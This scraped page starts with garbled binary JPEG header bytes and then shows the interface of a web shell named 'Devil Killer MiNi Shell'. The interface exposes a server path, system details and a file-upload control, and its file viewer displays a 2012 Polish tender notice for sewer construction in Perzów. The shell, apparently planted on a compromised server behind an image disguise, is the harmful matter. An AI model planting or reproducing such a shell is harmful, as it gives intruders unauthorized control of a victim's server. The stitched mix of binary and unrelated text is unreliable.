JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120308/72600-N-2012.html

<p class="kh_header"><b>Perzów: Budowa kolektora sanitarnego w miejscowości Perzów i Domasłów</b><br>
<b>Numer ogłoszenia: 72600 - 2012; data zamieszczenia: 08.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Perzów , 78, 63-642 Perzów, woj. wielkopolskie, tel. 0-62 78 61 060, faks 0-62 78 61 509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.perzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kolektora sanitarnego w miejscowości Perzów i Domasłów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) . .  Zamówieniem objęta jest wybudowanie sieci kanalizacji sanitarnej grawitacyjno - tłocznej we wsi Domasłów i w przysiółku Szczęście oraz kolektora tranzytowego grawitacyjno-tłocznego na trasie od Domasłowa i od Szczęścia przez Nieprosin do gminnej oczyszczalni ścieków w Perzowie wraz z przykanalikami do pierwszej studzienki rewizyjnej na posesji bądź od przepompowni przyzagrodowej do kolektora, w tym siedem przepompowni sieciowych i dziewięć przepompowni zagrodowych wraz z przyłączami kablowymi WLZ. . . .
2) . .  ZAKRES ZAMÓWIENIA:::  Kolektory grawitacyjne PVC DN200 dł.4321 mb, , ,Kolektory grawitacyjne PVC DN250  dł.2328 mb, , ,Przykanaliki grawitacyjne PCV DN 160  72szt. dł.768 mb, , ,Kolektory tłoczne PEHD DN90  dł. 1964 mb, Kolektory tłoczne PEHD DN110 dł.2278 mb, , ,Kanały tłoczne PE DN63  dł.2115 mb, , ,Przepompownie sieciowe (polimerabeton fi 1200-1500mm, moce pomp nie większe niż 2x 4,2 kW)- 7szt., w tym przyłącza kablowe WLZ oraz zagospodarowanie i wyposażenie terenu przepompowni, , ,Przepompownie zagrodowe (PE fi 800mm,  pompy o mocy =1x1,5 kW)  9 szt., w tym przyłącza kablowe WLZ, , ,System GRPS monitowania i sterowania przepompowniami sieciowymi, , ,Odtworzenie na całej szerokości  nawierzchni z betonu asfaltowego dróg powiatowych na pow.2520 m^2 i wykonanie innych robót odtworzeniowych na drogach powiatowych - jak wskazano w dziale 16 przetargowego przedmiaru robót, , ,obsługa geodezyjna,  inne roboty i czynności związane z przeprowadzeniem i odbiorem inwestycji. . . .3) Zamawiający wymaga udzielenia przez Wykonawcę gwarancji na wykonane przez siebie roboty i użyte materiały i urządzenia na okres 3 lat licząc od daty odbioru końcowego zadania, a na urządzenia centrali GRPS- 2 lata. . . .4) . . Umowa przewiduje wynagrodzenie ryczałtowe odpowiadające osiągnięciu efektów rzeczowych ujętych w harmonogramie rzeczowo-finansowym. Rozliczenie końcowe nastąpi na podstawie obmiarów powykonawczych osiągniętych efektów rzeczowych wg pozycji wyszczególnionych w tym harmonogramie. . . .
5) . .PONADTO Wykonawca zobowiązuje się do wykonania na rzecz Zamawiającego niżej wymienionych robót, czynności i nałożonych obowiązków będących również przedmiotem zamówienia: : :pełna obsługa geodezyjna budowy na każdym jej etapie, , ,zapewnienie kierownictwa budowy przez osoby uprawnione, , ,opracowanie planu wyrębu drzew i uzyskanie zezwolenia na ich wycinkę, , ,zabezpieczenie bezpieczeństwa ruchu drogowego w czasie wykonywania robót, a także opracowanie projektu organizacji ruchu na drogach powiatowych wraz z niezbędnymi uzgodnieniami i zezwoleniami, , ,uzyskanie zezwolenia na zajęcie pasa drogowego na odcinkach robót przypadających w pasie dróg powiatowych i uregulowanie wszelkich opłat naliczanych z tego tytułu przez Powiatowy Zarząd Dróg w Kępnie, a także uregulowanie opłat za trwałe umieszczenie urządzenia obcego w pasie dróg powiatowych za okres do końca 2012 roku, , ,odtworzenie nawierzchni dróg  powiatowych i chodników w sposób określony w decyzji PZD w Kępnie w zakresie rzeczowym określonym w dziale 16 przedmiaru, , ,wykonanie przewiertów lub przecisków w rurze osłonowej każdorazowo w przypadku poprzecznego przejścia kolektora lub przykanalika przez drogi o nawierzchni bitumicznej - nawet jeżeli nie zostało tak wskazane w projekcie, , ,wyposażenie oczyszczalni ścieków w Perzowie i uruchomienie centrali GRPS do monitowania i sterowania pracy przepompowni sieciowymi, , ,kompletne zagospodarowanie i wyposażenie wszystkich przepompowni ścieków, , , wykonanie dwóch tablic informacyjnych na osobnej konstrukcji wsporczej, , ,dla wszystkich przepompowni sieciowych i zagrodowych wykonanie przyłączy energetycznych kablowych WLZ, , ,odtworzenie nawierzchni dróg gminnych do stanu poprzedniego, , ,dla gminnych dróg gruntowych, w ciągu których układano kolektory kanalizacyjne, odtworzenie nawierzchni drogowej na szerokości 3,0 m z użyciem tłucznia drogowego frakcji 31,5-63 mm na grubości 15 cm dł.1100 mb w celu przywrócenia przejezdności drogi po robotach kanalizacyjnych, , ,dopełnienie wszelkich zaleceń wynikających z wszystkich uzgodnień branżowych projektu, w tym czynności formalno-prawnych, przeprowadzenie (na własny koszt): -wszelkich badań zagęszczenia gruntu i podłoża, -wszelkich robót i czynności związanych z odbiorem, badaniem przedmiotu odbioru, -rozruchów technologicznych przepompowni sieciowych i przepompowni zagrodowych, -wszelkich robót i czynności związanych z przekazaniem do eksploatacji (w tym opracowanie instrukcji eksploatacji, przeszkolenie pracowników Zamawiającego obsługujących przepompownie), -opracowanie dokumentacji powykonawczej - - niezależnie od wskazań zawartych w projektach. . . 
6)  TERMIN zakończenia wszelkich robót budowlano-montażowych sieciowych i drogowych - do dnia 30. października 2012r.,,, termin zakończenia robót przy przepompowniach i dokonania rozruchu technologicznego - do dnia 30. listopada 2012r.,,, termin uruchomienia centrali GRPS, zakończenia wszelkich procedur odbiorowych, rozliczeń i przeprowadzenia odbioru końcowego i przekazania do eksploatacji całego przedsięwzięcia inwestycyjnego - do dnia 15. stycznia 2013r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się możliwość udzielenia dotychczasowemu wykonawcy zamówień uzupełniających w terminie nie później niż do końca 2012 roku, o łącznej wartości nie przekraczającej 100.000,-zł wartości zamówienia podstawowego - polegających na wykonaniu dodatkowych kolektorów, przykanalików i innych elementów sieci kanalizacyjnej nie ujętych w przedmiocie zamówienia podstawowego a zlokalizowanych w obszarze jego realizacji, w tym na odtworzeniach dróg zniszczonych przez budowę sieci kanalizacyjnej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.24.10-9, 45.23.24.23-3, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium 60.000,00 zł . . . Jeżeli Wadium jest wnoszone w pieniądzu, to  musi być wpłacone przelewem na konto Zamawiającego: Spółdzielczy Bank Ludowy w Kępnie - Oddział w Perzowie nr 63 8413 0000 0200 0619 2000 0006  w taki sposób, aby znalazło się na koncie Zamawiającego najpóźniej przed terminem składania ofert (co oznacza, że za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył roboty budowlane w zakresie budowy kanalizacji sanitarnej spełniając oba następujące warunki: : a)  łączny zakres wykonanych w całym tym okresie urządzeń przez wykonawcę wynosi co najmniej 6000 mb kolektorów grawitacyjnych, co najmniej 6000 mb kolektorów i kanałów tłocznych, co najmniej 60 szt. przykanalików co najmniej trzy przepompownie ścieków sanitarnych;;; b)  co najmniej dwie roboty o wartości ponad 1.500.000,-zł netto każda z tych robót zostały zrealizowane w  generalnym wykonawstwie przez wykonawcę składającego ofertę. . .Wymagane jest jednoznaczne potwierdzenie zrealizowanego zakresu, wartości robót, generalnego wykonawstwa  wynikającego z załączonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu realizacji przedmiotowego zamówienia będzie dysponował sprzętem w zakresie co najmniej: dwie koparko-spycharki,, dwie koparki, ponadto jedna koparka gąsienicowa, , dwa samochody samowyładowcze, , dwa zestawy igłofiltrów, , szalunki boksowe 4 szt. lub inne szalunki dla dwóch brygad, , dwa ubijaki spalinowe skoczkowe, , dwie zagęszczarki (płyty wibracyjne).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dysponuje lub będzie dysponował osobą uczestniczą w wykonaniu przedmiotowego zamówienia zdolną do pełnienia funkcji kierownika budowy przy realizacji zamówienia (posiadającą uprawnienia budowlane sanitarnej oraz przynależącą do Polskiej Izby Inżynierów Budownictwa), o doświadczeniu zawodowym co najmniej 3 lata jako kierownik budowy na podobnych robotach. . .

 2. Dysponuje lub będzie dysponował osobami uczestniczącymi w wykonaniu przedmiotowego zamówienia odpowiedzialnymi za kierowanie robotami budowlanymi w branży: : a) instalacji sanitarnych - o doświadczeniu zawodowym co najmniej 2 lat jako kierownik robót przy podobnych robotach, , b) drogowej (do nadzoru nad realizacją robót odtworzeniowych drogowych) - o wymaganych uprawnieniach budowlanych w branży drogowej, , c) instalacji elektrycznych (do nadzoru nad robotami branży elektrycznej i automatyki przy realizacji przepompowni wraz z zasilaniem) - o wymaganych uprawnieniach budowlanych branży elektrycznej. . .

3. W celu realizacji przedmiotowego zamówienia będzie dysponował co najmniej dwoma brygadami pracowników fizycznych (w tym operatorów sprzętu) po co najmniej 5 osób w każdej brygadzie do realizacji robót ziemnych i montażowych w pełnym zakresie (nie wlicza się w to brygad wykonujących prace montażowe przy przepompowniach sieciowych i zagrodowych, wykonujących  prace w zakresie nawierzchni drogowych, wykonujących przewierty i przeciski, wykonujących roboty branży elektrycznej, obsługi geodezyjnej).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.. Dysponuje środkami finansowymi lub zdolnością kredytową wykonawcy na kwotę co najmniej 1.500.000,- zł. . . 

2..  Posiada opłacona polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę ubezpieczenia co najmniej 1.500.000,- zł, z limitem w wys. co najmniej 1.500.000,- zł na jedno zdarzenie ubezpieczeniowe.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Oferta wykonawcy wg wzoru (zał. nr 1 do SIWZ), , 
b)	UPROSZCZONY KOSZTORYS OFERTOWY, NA KWOTĘ KOŃCOWA NETTO ZGODNĄ Z CENA OFERTY, SPORZĄDZONY NA OBOWIĄZUJĄCYM FORMULARZU STANOWIĄCYM ZAŁĄCZNIK nr12 DO SIWZ, , 
c)	Dowód wniesienia wadium -jak opisano w SIWZ, ,
d)	Dokument potwierdzający, że osoby podpisujące ofertę są prawnie umocowane do reprezentowania wykonawcy - tylko w przypadku, gdy umocowanie takie nie wynika bezpośrednio z załączonego do oferty odpisu z właściwego rejestru, , 
e)	Oświadczenie wykonawcy (wg wzoru -zał. nr 2 do SIWZ) o spełnianiu wymogów art.22 ust.1 ustawy, , 
f)	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia (art. 23 ust.2) - tylko w przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. konsorcjum).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. ZMIANA CZASU NA UKOŃCZENIE ROBÓT : : 1. Zmiany spowodowane nieprzewidzianymi w SIWZ nadzwyczajnymi warunkami jak: niewypały i niewybuchy; wykopaliska archeologiczne; działanie siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub innymi przyczynami zewnętrznymi niezawinionymi przez Wykonawcę oraz niezależnymi od Zamawiającego oraz Wykonawcy skutkujące obiektywną niemożliwością prowadzenia prac lub wykonywania innych czynności; 2.  Zmiany będące następstwem okoliczności za które odpowiada Zamawiający lub leżących po stronie Zamawiającego, w szczególności: 1) koniecznością usunięcia istotnych błędów lub wprowadzenia istotnych zmian w dokumentacji projektowej, bez dokonania których obiektywnie nie jest możliwe dalsze prowadzenie robót przez Wykonawcę, 2) nie uzyskaniem przez Zamawiającego prawomocnego pozwolenia na budowę w terminie wskazanym w umowie, 3) nie uzyskanie z zakładu energetycznego warunków technicznych w sprawie zasilania przepompowni  w terminie umożliwiającym Wykonawcy dochowania terminów umownych, 4) nie uzyskanie lub cofniecie zgody-zgód  właścicieli terenu na realizację inwestycji na terenie do nich należących; 3. Zmiany będące następstwem wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy; 4. Zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w szczególności eksploatatorów infrastruktury. .
II.  ZMIANA SPOSOBU SPEŁNIENIA ŚWIADCZENIA, JEGO ZAKRESU, ZMIANA WYNAGRODZENI: : 1.. Zmiany spowodowane koniecznością zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych- technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy; 2.. Zmiany spowodowane wprowadzeniem przez Zamawiającego istotnych zmian w dokumentacji projektowej, jeżeli takie zmiany dokumentacji okażą się konieczne i jednocześnie mają znaczący wpływ na zmianę kosztów lub zmianę sposobu spełnienia świadczenia; 3.. Dopuszczalne zmiany w umowie prowadzące do: 1) podniesienie bezpieczeństwa wykonywania robót przy braku zmiany ceny końcowej, lub 2) obniżenia kosztu wykonania robót i jednocześnie obniżenia wynagrodzenia należnego Wykonawcy bez uszczerbku dla jakości i funkcjonalności, lub 3) obniżenia kosztów użytkowania obiektu czy eksploatacji urządzeń, bez uszczerbku dla jakości i funkcjonalności, przy braku zmiany ceny końcowej. 4.. Zakres rzeczowy zamówienia określony umową może zostać ograniczony przez Zamawiającego, lecz nie więcej niż o 20 procent wartości umowy, bez skutków finansowych i prawnych dla Zamawiającego, w przypadku gdy wykonanie przedmiotu zamówienia w pełnym zakresie nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć. W przypadku ograniczenia zakresu przedmiotu nastąpi zmniejszenie wynagrodzenia i ustalenie jego nowej wartości. Wartość robót wyłączonych zostanie ustalona w pierwszej kolejności w oparciu o kosztorys ofertowy wykonawcy. 5.. Końcowa wartość wynagrodzenia należnego Wykonawcy za realizację przedmiotu umowy może ulec zmianie w stosunku do treści oferty; wartość ta zostanie ustalona na podstawie obmiarów powykonawczych zrealizowanego zakresu - na zasadach i warunkach określonych w par. 3 ust.8 umowy. 6.. III.  ZMIANA OSÓB I PODMIOTÓW: : 1.. Zmiany osób i podmiotów zdolnych do wykonania zamówienia, w przypadku zdarzeń losowych niezależnych od Wykonawcy, na uzasadnione wystąpienie Wykonawcy; 2.. Zmiany osoby pełniącej funkcje 